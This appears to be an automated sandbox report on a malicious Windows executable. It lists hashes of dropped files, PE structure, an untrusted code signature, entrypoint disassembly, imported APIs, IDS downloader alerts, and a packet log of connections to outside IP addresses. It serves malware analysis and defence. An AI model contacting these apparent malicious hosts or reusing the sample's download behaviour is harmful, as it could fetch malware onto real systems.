SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Preview: |
Process: | C:\Users\user\Desktop\file.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328009 |
Entropy (8bit): | 1.2551228776153396 |
Encrypted: | false |
SSDEEP: | 1536:AfCPIKQLWsgBwj5eZNb+h+QkSGkJPsGyksKU:ATKZNbTQkSGky0sKU |
MD5: | 78C7002A6C29415CEA767894F99BDF01 |
SHA1: | 37B39AF4E61D2A97D1B1AEA54D1C3C3D8C3AD6D8 |
SHA-256: | 414BB9BB930F1269088CF9BF027667E6B9A4130E6E719E7C178406A8C8C3183E |
SHA-512: | A39B5656AF287783AB4C5E211C148D2D233AB635E8D8C4870693D31267904E9C94A3BCC07B20F92C55F68BC7E6E2B5F1D22C6ED3F9B3A729CABD14B2E7B58D58 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\file.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 453 |
Entropy (8bit): | 4.241518252490206 |
Encrypted: | false |
SSDEEP: | 6:mTXCFWRbo5FpTNrQNFqqhq48RZ8av8Atp3d6G4bg3pCp+oWKHYAtpcRvFVTZqIMC:0X4OA7aY48MNAtDMeExYAYdfqI1f1o2 |
MD5: | 261F38F05E7DE27DA302C07B62E1F94D |
SHA1: | 8D495D43FC7A2B40C52B8D31678F24B519257610 |
SHA-256: | 50D950EE2F6CD5D31AAA35B913DC46C8EEE3120B7444EF5EBB302B88851F3328 |
SHA-512: | 62106A1D3608A63C12D6E9A7A00FD775ECD38193B779D4C13E18850230F1C7A1F0BD5DF0602AF5553F24BB0BAD6703BB9DC00C09C14E91DD098CE4EC95050E47 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\file.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 340463 |
Entropy (8bit): | 7.6883510403915185 |
Encrypted: | false |
SSDEEP: | 6144:/UUvKKVQiIl/mdVzp9A2e3dLVKPbsKZpRqHrb5OmuwYjofT:MUvKKyAFOh3DwYKQuSfT |
MD5: | B7996FE76D831F7949992DA7E460B2F6 |
SHA1: | AC086BA78FB87FD615A5C4B760EBB90057EBB46E |
SHA-256: | DBD8E48ED8E7EC0FBEAD479F69B3A733C33D2F814EF70161F7D65331CC069C02 |
SHA-512: | 4721F5D304B7077C29FB87923B8278E326E1EEBB24446BA450445006C7976D75BD529A119AF3E72DA009FF4CC1907690417823EA95430962F35FFFE598DD2F77 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\file.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 245776 |
Entropy (8bit): | 1.2423947315855175 |
Encrypted: | false |
SSDEEP: | 768:7x19EzEPqdI04IDk5wH/o606sFjlhpHi98oiQErpn6jGW3LSSW1Vn+7xd4R89Z9u:13ujvdGpic/cN2q8+js/5/H |
MD5: | 9F9EC5CB34B99692A4EAC963634A7D82 |
SHA1: | 5C1C97F3B00365F6CDB43112D31D7DD3AA050870 |
SHA-256: | 7579E3606C789ED66E555D541F14BDA6ECAEA4B2EB7B7BC3A25E7C804B3AB48F |
SHA-512: | A574404306396B333F64FC16256C093CA1F2B6CF87E5675ED678F00DE3B899FFE4A95CBA4D1113B9C86B8C46549D06D7AB97930955F921CD73AE37D4067B1EB0 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\file.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 452228 |
Entropy (8bit): | 1.250842541049128 |
Encrypted: | false |
SSDEEP: | 768:qlmssNPVJP2ri6hEVTp7WLL1GEOCTOemgej7kcwntQz2Y1drtNhgCV+AhB/7/dR+:5tvPloD3bnq3TzwesbDEfLeaz6oSzjU8 |
MD5: | 30C2C02FB78EFAA65C6A38457A7DC4F6 |
SHA1: | 40AEF6B9982695F88F0515104BFEEACFAF22FEDA |
SHA-256: | CE57C2DEDAA3A0FD5F5C267F3336F5ACB6109D00D31A98D4638D26A77939CEFC |
SHA-512: | 8AC0B2E7831C801D7C4043195BEFC309F2C79BE719FF0171D0A4E580671EBADD2F737C307A4AAE2E548705CD11B24FE64F07C6E842D7DD5D3CCD88EA677BC7FA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.620010644230869 |
TrID: |
|
File name: | file.exe |
File size: | 750'104 bytes |
MD5: | 7fbb332b55f872e61c8307e0b5242287 |
SHA1: | b499466240ef01da4a2cf380d709752b2e44232a |
SHA256: | 9845acc424512cc5b0c67de96ce917624b5e80ee95ea4ea6a7cbc37b7c03ef63 |
SHA512: | e813f006263b87a5078bca9c58b94567ac8df627b27d44411774b797bdd7095f9bebaff8a1d2f0329b8fc63016199ef7e04ec17d68ce28b250cd3da37c2e8d04 |
SSDEEP: | 12288:TfLdembnSidi8rrdTT4aQUh9IHUM1mPCeBxHnymwsXFDsiJjWlWVB0mPHp:TfLNnSsi8dTTCjmqePSrsXF4i7XPPJ |
TLSH: | 06F412093FB8E6F3C0D16D3915B243561BF0B19615496F137310BF4AA9AE6A3980EFE4 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j......... |
Icon Hash: | 2b25372d4e5ad12f |
Entrypoint: | 0x403532 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | f4639a0b3116c2cfc71144b88a929cfd |
Signature Valid: | false |
Signature Issuer: | CN="Dumdristig Cathetometer ", O=Nonculpably, L=Medaryville, S=Indiana, C=US |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | 2125E78073B3DE10354E99A49884F940 |
Thumbprint SHA-1: | 633626C811E5AD013D25FF7C0026F7D7152AC243 |
Thumbprint SHA-256: | ECEA41CEFFE02297DF1297EBEE32E2BD6E688EF8E19AF9254DAF23053AB9C26F |
Serial: | 44FB76A8AED1ADDCF3394332BFEEF80025A47D57 |
Instruction |
---|
sub esp, 000003F8h |
push ebp |
push esi |
push edi |
push 00000020h |
pop edi |
xor ebp, ebp |
push 00008001h |
mov dword ptr [esp+20h], ebp |
mov dword ptr [esp+18h], 0040A2D8h |
mov dword ptr [esp+14h], ebp |
call dword ptr [004080A4h] |
mov esi, dword ptr [004080A8h] |
lea eax, dword ptr [esp+34h] |
push eax |
mov dword ptr [esp+4Ch], ebp |
mov dword ptr [esp+0000014Ch], ebp |
mov dword ptr [esp+00000150h], ebp |
mov dword ptr [esp+38h], 0000011Ch |
call esi |
test eax, eax |
jne 00007FCB690670EAh |
lea eax, dword ptr [esp+34h] |
mov dword ptr [esp+34h], 00000114h |
push eax |
call esi |
mov ax, word ptr [esp+48h] |
mov ecx, dword ptr [esp+62h] |
sub ax, 00000053h |
add ecx, FFFFFFD0h |
neg ax |
sbb eax, eax |
mov byte ptr [esp+0000014Eh], 00000004h |
not eax |
and eax, ecx |
mov word ptr [esp+00000148h], ax |
cmp dword ptr [esp+38h], 0Ah |
jnc 00007FCB690670B8h |
and word ptr [esp+42h], 0000h |
mov eax, dword ptr [esp+40h] |
movzx ecx, byte ptr [esp+3Ch] |
mov dword ptr [004347B8h], eax |
xor eax, eax |
mov ah, byte ptr [esp+38h] |
movzx eax, ax |
or eax, ecx |
xor ecx, ecx |
mov ch, byte ptr [esp+00000148h] |
movzx ecx, cx |
shl eax, 10h |
or eax, ecx |
movzx ecx, byte ptr [esp+0000004Eh] |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x65000 | 0x264e8 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xb68a8 | 0x970 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x68d8 | 0x6a00 | 742185983fa6320c910f81782213e56f | False | 0.6695165094339622 | data | 6.478461709868021 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x1464 | 0x1600 | a995b118b38426885fc6ccaa984c8b7a | False | 0.4314630681818182 | data | 4.969091535632612 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xa000 | 0x2a818 | 0x600 | 9a9bf385a30f1656fc362172b16d9268 | False | 0.5247395833333334 | data | 4.172601271908501 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x35000 | 0x30000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x65000 | 0x264e8 | 0x26600 | 8c15b9178dda9297a3b68e6314e77cb0 | False | 0.48827488802931596 | data | 5.053989943267582 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x652c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.4677629244055365 |
RT_ICON | 0x75af0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.5025751524069791 |
RT_ICON | 0x7ef98 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736 | English | United States | 0.5306377079482439 |
RT_ICON | 0x84420 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.5394426074633916 |
RT_ICON | 0x88648 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.5737551867219917 |
RT_DIALOG | 0x8abf0 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x8acf0 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x8ae10 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x8aed8 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x8af38 | 0x4c | data | English | United States | 0.8157894736842105 |
RT_VERSION | 0x8af88 | 0x21c | data | English | United States | 0.5388888888888889 |
RT_MANIFEST | 0x8b1a8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795 |
DLL | Import |
---|---|
ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW |
SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW |
ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree |
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create |
USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics |
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor |
KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-25T16:01:26.987824+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49710 | 185.29.11.53 | 80 | TCP |
2024-09-25T16:01:28.683636+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49711 | 132.226.247.73 | 80 | TCP |
2024-09-25T16:01:30.386762+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49711 | 132.226.247.73 | 80 | TCP |
2024-09-25T16:01:30.954113+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49715 | 188.114.97.3 | 443 | TCP |
2024-09-25T16:01:31.683648+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49716 | 132.226.247.73 | 80 | TCP |
2024-09-25T16:01:34.877195+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49721 | 188.114.97.3 | 443 | TCP |
2024-09-25T16:01:39.227302+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49727 | 188.114.97.3 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 25, 2024 16:01:26.358067036 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:26.363017082 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:26.363274097 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:26.363347054 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:26.368144035 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:26.987665892 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:26.987684011 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:26.987695932 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:26.987709999 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:26.987735987 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:26.987749100 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:26.987760067 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:26.987823963 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:26.987965107 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.068506002 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.068525076 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.068536997 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.068550110 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.068563938 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.068749905 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.068846941 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.068859100 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.068873882 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.068934917 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.068990946 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.074498892 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.074522972 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.074532986 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.074546099 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.074620962 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.074717999 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.322233915 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322251081 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322257996 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322278976 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322289944 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322294950 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322303057 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322314024 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.322340012 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.322362900 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322376966 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322382927 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.322390079 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322401047 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322407007 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322410107 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.322412968 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322427034 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.322432041 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322443962 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322457075 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322460890 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.322463989 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322482109 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322493076 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.322493076 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322505951 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322513103 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.322520971 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322532892 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322542906 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322546959 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.322547913 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322554111 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322566986 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322586060 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.322586060 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.322598934 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322609901 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322613001 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.322623014 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322633982 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.322640896 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.322675943 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.327585936 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.327599049 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.327611923 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.327641964 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.327667952 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.327687025 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.327699900 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.327732086 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.327766895 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.327980995 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.328031063 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.328037024 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.328048944 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.328080893 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.328099966 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.328377962 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.328392029 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.328423977 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.328450918 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.329346895 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.329359055 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.329370975 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.329401016 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.329490900 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.329504967 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.329511881 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.329539061 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.329567909 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.330221891 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.330235004 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.330240965 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.330296993 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.330310106 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.330322981 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.330358028 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.330415010 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.330723047 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.330763102 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.330765963 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.330775976 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.330804110 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.330817938 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.330826044 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
